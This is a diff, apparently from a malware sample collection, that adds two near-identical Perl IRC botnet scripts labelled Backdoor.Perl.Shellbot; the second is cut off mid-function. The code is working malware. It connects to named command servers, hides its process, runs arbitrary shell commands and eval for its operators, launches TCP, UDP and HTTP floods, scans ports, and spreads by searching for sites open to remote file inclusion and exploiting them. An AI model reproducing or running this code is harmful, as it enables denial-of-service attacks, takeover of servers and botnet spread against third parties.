$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}
DDDDDDDD

515
Perl/Backdoor.Perl.Shellbot.o Normal file
View File

@ -0,0 +1,515 @@
# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
# ------[eoff = End Of Fucking Files]-----
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
my $processo = 'httpsl';
# Bermula Disini
my @titi = ("afrika-");
my $sleep='5';
my $linas_max='4';
my @adms=("xx","ok","mos", "Boss_xx", "KKTeam", "KaHiN");
my @hostauth=("fbi.gov");
my @canais=("#mambo");
my $nick= $titi[rand scalar @titi];
my $ircname = $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);
$servidor='xx.albap0wer.com' unless $servidor;
my $porta='8555';
my $versi_saya = '1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22com_extcalendar%22+inurl%3Aindex.php?option=com_extcalendar+site%3A&".$dom."%20");
}
my $query="www.google.co.uk/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="hl=en&lr=&start=$&sa=N";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}

515
Perl/Backdoor.Perl.Shellbot.s Normal file
View File

@ -0,0 +1,515 @@
# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
# ------[eoff = End Of Fucking Files]-----
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
my $processo = 'httpsl';
# Bermula Disini
my @titi = ("PhpNuke-|");
my $sleep='5';
my $linas_max='4';
my @adms=("xx","mos","fuckyou");
my @hostauth=("fbi.gov");
my @canais=("#phpnuke1");
my $nick= $titi[rand scalar @titi];
my $ircname = $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8209';
my $versi_saya = '1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/modules/Forums/admin/admin_users.php?phpbb_root_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
